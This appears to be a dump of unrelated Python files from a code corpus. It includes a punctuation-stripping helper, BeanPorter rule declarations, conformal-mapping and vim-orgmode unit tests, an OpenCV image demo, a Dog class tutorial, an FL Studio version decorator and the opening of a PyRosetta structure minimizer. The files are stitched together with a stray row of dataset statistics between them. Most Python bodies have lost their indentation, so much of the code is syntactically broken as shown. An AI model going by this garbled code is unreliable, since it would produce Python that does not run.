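    {"areaType": "region", "areaCode": "E12000007"},
    {"areaType": "utla", "areaCode": "E10000002"},  # no match -> None, as in a left join
]

# Left-join on (areaType, areaCode), as the DataFrame.join call does.
for row in rows:
    row["areaName"] = ref.get((row["areaType"], row["areaCode"]))

print([r["areaName"] for r in rows])  # ['England', 'London', None]
```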
# ==== Source/RemovePunctuation.py (jj-style/Cryptobreaker, MIT) ====
import string
punctuation = string.punctuation + "’" + '“' + "‘" + "—"
def RemovePunctuation(text,remove_spaces=True,to_lower=True):
text = list(text)
while "\n" in text:
text.remove("\n")
text = "".join(text)
if remove_spaces:
text = text.replace(" ","")
if to_lower:
text=text.lower()
for letter in text:
if letter in punctuation:
text = text.replace(letter,"")
text = text.strip("\n")
return text
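The helper above strips newlines, optionally spaces, optionally case, and all punctuation (including the typographic quotes and the em dash added to `string.punctuation`). A self-contained sketch of the same pipeline, with a made-up sample string:

```python
import string

# Same punctuation set as the module above: ASCII punctuation plus a few
# typographic characters that string.punctuation does not cover.
punctuation = string.punctuation + "’" + "“" + "‘" + "—"

def remove_punctuation(text, remove_spaces=True, to_lower=True):
    # Mirrors RemovePunctuation above: drop newlines, optionally spaces,
    # optionally lowercase, then strip every punctuation character.
    text = text.replace("\n", "")
    if remove_spaces:
        text = text.replace(" ", "")
    if to_lower:
        text = text.lower()
    return "".join(ch for ch in text if ch not in punctuation)

print(remove_punctuation("Hello, World!\nTest—case"))  # helloworldtestcase
```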
# ==== src/BeanPorter/bpcml/Decls.py (WeZZard/BeanPorter, MIT) ====
#!/usr/bin/env python3
from abc import abstractmethod
from typing import Dict, Optional
from BeanPorter.bpcml.Exprs import Expr
class Decl(object):
def __init__(self):
pass
@abstractmethod
def evaluate(self, variables: Dict[str, str]) -> str:
pass
class RuleDecl(Decl):
def __init__(self, expr: Optional[Expr] = None):
self.expr = expr
super().__init__()
def __str__(self) -> str:
return self.expr.__str__()
def __repr__(self) -> str:
return self.expr.__repr__()
def evaluate(self, variables: Dict[str, str]) -> str:
if self.expr is None:
return ""
return self.expr.evaluate(variables)
@staticmethod
def make_empty() -> 'RuleDecl':
return RuleDecl()
@staticmethod
def make(expr: Expr) -> 'RuleDecl':
assert(expr is not None)
return RuleDecl(expr)
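The `Decl`/`RuleDecl` pattern above delegates evaluation to an optional `Expr`, returning the empty string when none is set. A minimal self-contained sketch of that pattern; `ConstExpr` is a hypothetical stand-in for the real `Expr` in `BeanPorter.bpcml.Exprs`:

```python
from typing import Dict, Optional

class ConstExpr:
    """Hypothetical stand-in for Expr: a constant-valued expression."""
    def __init__(self, value: str):
        self.value = value

    def evaluate(self, variables: Dict[str, str]) -> str:
        # A constant expression ignores the variable bindings.
        return self.value

class RuleDecl:
    def __init__(self, expr: Optional[ConstExpr] = None):
        self.expr = expr

    def evaluate(self, variables: Dict[str, str]) -> str:
        # An empty rule evaluates to the empty string, as in make_empty().
        if self.expr is None:
            return ""
        return self.expr.evaluate(variables)

print(RuleDecl(ConstExpr("income")).evaluate({}))  # income
```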
# ==== tests/test_region.py (TorbenFricke/cmtoolkit, BSD-3-Clause) ====
import unittest
from conformalmapping import *
class TestRegion(unittest.TestCase):
def setUp(self):
self.regions = [
Disk(Circle(0.0, 1.0))
]
self.p = Circle(0.0, 1.0)
def test_str_present(self):
for r in self.regions:
str(r)
def test_repr_present(self):
for r in self.regions:
repr(r)
def test_empty_constructors(self):
r = Region()
def test_onearg_constructors(self):
r = Region(outer = self.p)
def test_list_constructors(self):
r = Region(outer = [self.p, self.p])
def test_bad_constructor(self):
with self.assertRaises(Exception):
r = Region(outer = [42])
def test_interior_constructor(self):
r = Region.interiorto(self.p)
def test_exterior_constructor(self):
r = Region.exteriorto(self.p)
# ==== month06/Machine_learning/day08/demo/02_img_read_save.py (chaofan-zheng/python_learning_code, Apache-2.0) ====
# 02_img_read_save.py
# Read, display, and save an image
import cv2

im = cv2.imread("../test_img/Linus.png",  # image path
                1)  # 1 - color image, 0 - grayscale image
print(type(im))  # print the type: ndarray
print(im.shape)  # print the image shape

# Display
cv2.imshow("im",  # window name (if repeated, later calls overwrite the earlier window)
           im)  # image data, the return value of imread

# Save
cv2.imwrite("Linus_new.png",  # path for the saved image
            im)  # image data

cv2.waitKey()  # wait for a keypress (blocking call)
cv2.destroyAllWindows()  # destroy all created windows
# ==== vim/plugins/vim-orgmode/tests/test_plugin_navigator.py (Raymond-yn/dotfiles, MIT) ====
# -*- coding: utf-8 -*-
import unittest
import sys
sys.path.append(u'../ftplugin')
import vim
from orgmode._vim import ORGMODE
from orgmode.py3compat.encode_compatibility import *
START = True
END = False
def set_visual_selection(visualmode, line_start, line_end, col_start=1,
col_end=1, cursor_pos=START):
if visualmode not in (u'', u'V', u'v'):
raise ValueError(u'Illegal value for visualmode, must be in , V, v')
vim.EVALRESULTS['visualmode()'] = visualmode
# getpos results [bufnum, lnum, col, off]
vim.EVALRESULTS['getpos("\'<")'] = ('', '%d' % line_start, '%d' %
col_start, '')
vim.EVALRESULTS['getpos("\'>")'] = ('', '%d' % line_end, '%d' %
col_end, '')
if cursor_pos == START:
vim.current.window.cursor = (line_start, col_start)
else:
vim.current.window.cursor = (line_end, col_end)
counter = 0
class NavigatorTestCase(unittest.TestCase):
def setUp(self):
global counter
counter += 1
vim.CMDHISTORY = []
vim.CMDRESULTS = {}
vim.EVALHISTORY = []
vim.EVALRESULTS = {
# no org_todo_keywords for b
u_encode(u'exists("b:org_todo_keywords")'): u_encode('0'),
# global values for org_todo_keywords
u_encode(u'exists("g:org_todo_keywords")'): u_encode('1'),
u_encode(u'g:org_todo_keywords'): [u_encode(u'TODO'), u_encode(u'|'), u_encode(u'DONE')],
u_encode(u'exists("g:org_debug")'): u_encode(u'0'),
u_encode(u'exists("*repeat#set()")'): u_encode(u'0'),
u_encode(u'b:changedtick'): u_encode(u'%d' % counter),
u_encode(u"v:count"): u_encode(u'0'),
}
vim.current.buffer[:] = [ u_encode(i) for i in u"""
* Überschrift 1
Text 1
Bla bla
** Überschrift 1.1
Text 2
Bla Bla bla
** Überschrift 1.2
Text 3
**** Überschrift 1.2.1.falsch
Bla Bla bla bla
*** Überschrift 1.2.1
* Überschrift 2
* Überschrift 3
asdf sdf
""".split(u'\n') ]
if not u'Navigator' in ORGMODE.plugins:
ORGMODE.register_plugin(u'Navigator')
self.navigator = ORGMODE.plugins[u'Navigator']
def test_movement(self):
# test movement outside any heading
vim.current.window.cursor = (1, 0)
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (1, 0))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
def test_forward_movement(self):
# test forward movement
vim.current.window.cursor = (2, 0)
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (6, 3))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (13, 5))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (16, 4))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (17, 2))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
## don't move cursor if last heading is already focussed
vim.current.window.cursor = (19, 6)
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (19, 6))
## test movement with count
vim.current.window.cursor = (2, 0)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'-1')
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (6, 3))
vim.current.window.cursor = (2, 0)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'0')
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (6, 3))
vim.current.window.cursor = (2, 0)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'1')
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (6, 3))
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'3')
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (16, 4))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
self.navigator.next(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'0')
def test_backward_movement(self):
# test backward movement
vim.current.window.cursor = (19, 6)
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (17, 2))
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (16, 4))
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (13, 5))
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (6, 3))
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
## test movement with count
vim.current.window.cursor = (19, 6)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'-1')
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
vim.current.window.cursor = (19, 6)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'0')
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (18, 2))
vim.current.window.cursor = (19, 6)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'3')
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (16, 4))
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'4')
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'4')
self.navigator.previous(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
def test_parent_movement(self):
# test movement to parent
vim.current.window.cursor = (2, 0)
self.assertEqual(self.navigator.parent(mode=u'normal'), None)
self.assertEqual(vim.current.window.cursor, (2, 0))
vim.current.window.cursor = (3, 4)
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (3, 4))
vim.current.window.cursor = (16, 4)
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
vim.current.window.cursor = (15, 6)
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
## test movement with count
vim.current.window.cursor = (16, 4)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'-1')
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
vim.current.window.cursor = (16, 4)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'0')
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
vim.current.window.cursor = (16, 4)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'1')
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (10, 3))
vim.current.window.cursor = (16, 4)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'2')
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
vim.current.window.cursor = (16, 4)
vim.EVALRESULTS[u_encode(u"v:count")] = u_encode(u'3')
self.navigator.parent(mode=u'normal')
self.assertEqual(vim.current.window.cursor, (2, 2))
def test_next_parent_movement(self):
		# test movement to the next sibling of the parent
vim.current.window.cursor = (6, 0)
self.assertNotEqual(self.navigator.parent_next_sibling(mode=u'normal'), None)
self.assertEqual(vim.current.window.cursor, (17, 2))
def test_forward_movement_visual(self):
# selection start: <<
# selection end: >>
		# cursor position: |
# << text
# text| >>
# text
# heading
set_visual_selection(u'V', 2, 4, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV5gg'))
# << text
# text
# text| >>
# heading
set_visual_selection(u'V', 2, 5, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV9gg'))
# << text
# x. heading
# text| >>
# heading
set_visual_selection(u'V', 12, 14, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV15gg'))
set_visual_selection(u'V', 12, 15, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV16gg'))
set_visual_selection(u'V', 12, 16, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV17gg'))
# << text
# text
# text| >>
# heading
# EOF
set_visual_selection(u'V', 15, 17, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 15ggV20gg'))
# << text >>
# heading
set_visual_selection(u'V', 1, 1, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 1ggV5gg'))
# << heading >>
# text
# heading
set_visual_selection(u'V', 2, 2, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV5gg'))
# << text >>
# heading
set_visual_selection(u'V', 1, 1, cursor_pos=END)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 1ggV5gg'))
# << |text
# heading
# text
# heading
# text >>
set_visual_selection(u'V', 1, 8, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV8ggo'))
# << |heading
# text
# heading
# text >>
set_visual_selection(u'V', 2, 8, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 6ggV8ggo'))
# << |heading
# text >>
# heading
set_visual_selection(u'V', 6, 8, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 8ggV9gg'))
# << |x. heading
# text >>
# heading
set_visual_selection(u'V', 13, 15, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 15ggV15gg'))
set_visual_selection(u'V', 13, 16, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 16ggV16ggo'))
set_visual_selection(u'V', 16, 16, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 16ggV17gg'))
# << |x. heading
# text >>
# heading
# EOF
set_visual_selection(u'V', 17, 17, cursor_pos=START)
self.assertNotEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 17ggV20gg'))
# << |heading
# text>>
# text
# EOF
set_visual_selection(u'V', 18, 19, cursor_pos=START)
self.assertEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 19ggV20gg'))
# << heading
# text|>>
# text
# EOF
set_visual_selection(u'V', 18, 19, cursor_pos=END)
self.assertEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 18ggV20gg'))
# << heading
# text|>>
# EOF
set_visual_selection(u'V', 18, 20, cursor_pos=END)
self.assertEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 18ggV20gg'))
# << |heading
# text>>
# EOF
set_visual_selection(u'V', 20, 20, cursor_pos=START)
self.assertEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 20ggV20gg'))
def test_forward_movement_visual_to_the_end_of_the_file(self):
vim.current.buffer[:] = [ u_encode(i) for i in u"""
* Überschrift 1
Text 1
Bla bla
** Überschrift 1.1
Text 2
Bla Bla bla
** Überschrift 1.2
Text 3
**** Überschrift 1.2.1.falsch
Bla Bla bla bla
test
""".split(u'\n') ]
# << |heading
# text>>
# EOF
set_visual_selection(u'V', 15, 15, cursor_pos=START)
self.assertEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 15ggV17gg'))
set_visual_selection(u'V', 15, 17, cursor_pos=END)
self.assertEqual(self.navigator.next(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 15ggV17gg'))
def test_backward_movement_visual(self):
# selection start: <<
# selection end: >>
		# cursor position: |
# << text | >>
# text
# heading
set_visual_selection(u'V', 1, 1, cursor_pos=START)
self.assertEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! gv'))
set_visual_selection(u'V', 1, 1, cursor_pos=END)
self.assertEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! gv'))
# << heading| >>
# text
# heading
set_visual_selection(u'V', 2, 2, cursor_pos=START)
self.assertEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV2ggo'))
set_visual_selection(u'V', 2, 2, cursor_pos=END)
self.assertEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV2ggo'))
# heading
# text
# << |text
# text >>
set_visual_selection(u'V', 3, 5, cursor_pos=START)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV5ggo'))
# heading
# text
# << text
# text| >>
set_visual_selection(u'V', 3, 5, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV3ggo'))
# heading
# text
# << text
# text| >>
set_visual_selection(u'V', 8, 9, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 6ggV8ggo'))
# heading
# << text
# x. heading
# text| >>
set_visual_selection(u'V', 12, 14, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV12gg'))
set_visual_selection(u'V', 12, 15, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV12gg'))
# heading
# << |text
# x. heading
# text >>
set_visual_selection(u'V', 12, 15, cursor_pos=START)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 10ggV15ggo'))
# heading
# << text
# x. heading| >>
set_visual_selection(u'V', 12, 13, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV12gg'))
# heading
# << text
# heading
# text
# x. heading| >>
set_visual_selection(u'V', 12, 16, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV15gg'))
# << text
# heading
# text
# heading| >>
set_visual_selection(u'V', 15, 17, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 15ggV16gg'))
# heading
# << |text
# text
# heading
# text >>
set_visual_selection(u'V', 4, 8, cursor_pos=START)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV8ggo'))
# heading
# << text
# text
# heading
# text| >>
set_visual_selection(u'V', 4, 8, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 4ggV5gg'))
# heading
# << text
# text
# heading
# text| >>
set_visual_selection(u'V', 4, 5, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV4ggo'))
# BOF
# << |heading
# text
# heading
# text >>
set_visual_selection(u'V', 2, 8, cursor_pos=START)
self.assertEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV8ggo'))
# BOF
# heading
# << text
# text| >>
set_visual_selection(u'V', 3, 4, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV3ggo'))
# BOF
# << heading
# text
# text| >>
set_visual_selection(u'V', 2, 4, cursor_pos=END)
self.assertNotEqual(self.navigator.previous(mode=u'visual'), None)
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV2ggo'))
# << text
# heading
# text
# x. heading
# text| >>
set_visual_selection(u'V', 8, 14, cursor_pos=END)
self.navigator.previous(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 8ggV12gg'))
def test_parent_movement_visual(self):
# selection start: <<
# selection end: >>
		# cursor position: |
# heading
# << text|
# text
# text >>
set_visual_selection(u'V', 4, 8, cursor_pos=START)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! gv'))
# heading
# << text|
# text
# text >>
set_visual_selection(u'V', 6, 8, cursor_pos=START)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV8ggo'))
# heading
# << text
# text
# text| >>
set_visual_selection(u'V', 6, 8, cursor_pos=END)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 6ggV5gg'))
# << |heading
# text
# text
# text >>
set_visual_selection(u'V', 2, 8, cursor_pos=START)
self.assertEqual(self.navigator.parent(mode=u'visual'), None)
# << heading
# text
# heading
# text| >>
set_visual_selection(u'V', 2, 8, cursor_pos=END)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV5gg'))
set_visual_selection(u'V', 7, 8, cursor_pos=START)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV8ggo'))
# heading
# heading
# << text
# text| >>
set_visual_selection(u'V', 12, 13, cursor_pos=END)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 12ggV12gg'))
set_visual_selection(u'V', 10, 12, cursor_pos=START)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 2ggV12ggo'))
# heading
# << text
# text
# heading| >>
set_visual_selection(u'V', 11, 17, cursor_pos=END)
self.assertEqual(self.navigator.parent(mode=u'visual'), None)
# << text
# heading
# text
# x. heading
# text| >>
set_visual_selection(u'V', 8, 14, cursor_pos=END)
self.navigator.parent(mode=u'visual')
self.assertEqual(vim.CMDHISTORY[-1], u_encode(u'normal! 8ggV12gg'))
def suite():
return unittest.TestLoader().loadTestsFromTestCase(NavigatorTestCase)
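The `suite()` helper above follows the standard `unittest` loader pattern. A minimal self-contained sketch of the same pattern, with a hypothetical `DummyTestCase` standing in for `NavigatorTestCase`:

```python
import unittest

class DummyTestCase(unittest.TestCase):
    # Stand-in for NavigatorTestCase; the loader collects every test_* method.
    def test_addition(self):
        self.assertEqual(1 + 1, 2)

def suite():
    return unittest.TestLoader().loadTestsFromTestCase(DummyTestCase)

if __name__ == '__main__':
    # A runner script can execute the suite and inspect the result object.
    result = unittest.TextTestRunner().run(suite())
    print(result.wasSuccessful())
```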

# File: ch9_1_dogs.py (repo: codeplinth/python_crash_course, MIT license)
class Dog:
"""Simple attempt to model a dog"""
    def __init__(self, name, age):
"""Initialize name and age attributes"""
self.name = name
self.age = age
def sit(self):
"""Simulate a dog sitting in response to a command"""
print(f"{self.name} is now sitting !")
def roll_over(self):
"""Simulate rolling over in response to a command"""
print(f"{self.name} rolled over !")
my_dog = Dog('Willie',6)
your_dog = Dog('Lucy',2)
print(f"My dog's name is {my_dog.name}.")
print(f"My dog's age is {my_dog.age} years.")
my_dog.sit()
my_dog.roll_over()
print(f"Your dog's name is {your_dog.name}.")
print(f"Your dog's age is {your_dog.age} years.")
your_dog.sit()
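The pattern above scales naturally from two named instances to any number of them. A short self-contained sketch (the dog names and ages here are made up for illustration):

```python
class Dog:
    """Simple attempt to model a dog."""
    def __init__(self, name, age):
        self.name = name
        self.age = age

    def sit(self):
        print(f"{self.name} is now sitting!")

# Instances can be collected in a list and driven in a loop.
dogs = [Dog('Rex', 3), Dog('Bella', 5)]
for dog in dogs:
    dog.sit()

names = [dog.name for dog in dogs]
print(names)
```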

# File: src/flute/version.py (repo: antonsynd/flute, MIT license)
"""
Decorator to gate some of the tools here on what is available in the FL Studio
MIDI Scripting API version.
"""
import general
_fl_midi_scripting_api_version_number = general.getVersion()
def require_version(version):
def require_version_decorator(f):
def require_version_wrapper(*args, **kwargs):
if version > _fl_midi_scripting_api_version_number:
raise NotImplementedError(
'{}() not available in FL Studio MIDI Scripting API '
'version {}, requires version {}'.format(
f.__name__, _fl_midi_scripting_api_version_number,
version))
return f(*args, **kwargs)
return require_version_wrapper
    return require_version_decorator
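Outside FL Studio the `general` module is not importable, so here is a self-contained sketch of the same gating pattern with the API version stubbed out. The stub value `7`, `set_tempo`, and `newer_feature` are made up for illustration:

```python
_api_version = 7  # stand-in for general.getVersion()

def require_version(version):
    def require_version_decorator(f):
        def require_version_wrapper(*args, **kwargs):
            # Reject the call when the decorated function needs a newer API.
            if version > _api_version:
                raise NotImplementedError(
                    '{}() requires API version {}, have {}'.format(
                        f.__name__, version, _api_version))
            return f(*args, **kwargs)
        return require_version_wrapper
    return require_version_decorator

@require_version(5)
def set_tempo(bpm):
    return 'tempo set to {}'.format(bpm)

@require_version(9)
def newer_feature():
    return 'unreachable on API 7'

print(set_tempo(120))      # allowed: 5 <= 7
try:
    newer_feature()        # blocked: 9 > 7
except NotImplementedError as exc:
    print('blocked:', exc)
```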
| 30.230769 | 78 | 0.647583 | 88 | 786 | 5.431818 | 0.420455 | 0.135983 | 0.167364 | 0.240586 | 0.324268 | 0.324268 | 0 | 0 | 0 | 0 | 0 | 0 | 0.284987 | 786 | 25 | 79 | 31.44 | 0.850534 | 0.13486 | 0 | 0 | 0 | 0 | 0.122024 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bb403acdcf0fd7c25a1e41c78341852ffd2414a4 | 3,461 | py | Python | folding/minimizer.py | bigict/ProFOLD | 8fac3e18d25348fc9d1fbb17552a3ce3ae1cb953 | [
"MIT"
] | 1 | 2021-08-02T07:36:03.000Z | 2021-08-02T07:36:03.000Z | folding/minimizer.py | bigict/ProFOLD | 8fac3e18d25348fc9d1fbb17552a3ce3ae1cb953 | [
"MIT"
] | null | null | null | folding/minimizer.py | bigict/ProFOLD | 8fac3e18d25348fc9d1fbb17552a3ce3ae1cb953 | [
"MIT"
] | null | null | null | import os
import threading
import queue
import numpy as np
from pyrosetta import (
pose_from_sequence,
MoveMap,
rosetta,
create_score_function,
SwitchResidueTypeSetMover,
)
from pyrosetta.rosetta.protocols.minimization_packing import MinMover
from score import score_it
def _random_dihedral():
phi = [-140, -72, -122, -82, -61, 57]
psi = [153, 145, 117, -14, -41, 39]
w = [0.135, 0.155, 0.073, 0.122, 0.497, 0.018]
p = np.random.choice(range(6), p=w)
return phi[p], psi[p]
def _set_random_dihedral(pose):
for i in range(1, pose.total_residue()):
phi, psi = _random_dihedral()
pose.set_phi(i, phi)
pose.set_psi(i, psi)
pose.set_omega(i, 180)
def _random_pose(seq, constraint):
pose = pose_from_sequence(seq, "centroid")
_set_random_dihedral(pose)
constraint.apply(pose)
return pose
def _add_noise(pose):
for i in range(1, pose.total_residue()):
phi = pose.phi(i) + np.random.normal(0, 60)
psi = pose.psi(i) + np.random.normal(0, 60)
pose.set_phi(i, phi)
pose.set_psi(i, psi)
def _minimize_step(sf, pose):
mmap = MoveMap()
mmap.set_bb(True)
mmap.set_chi(False)
mmap.set_jump(True)
min_mover = MinMover(mmap, sf, "lbfgs_armijo_nonmonotone", 0.0001, True)
min_mover.max_iter(1000)
min_mover.apply(pose)
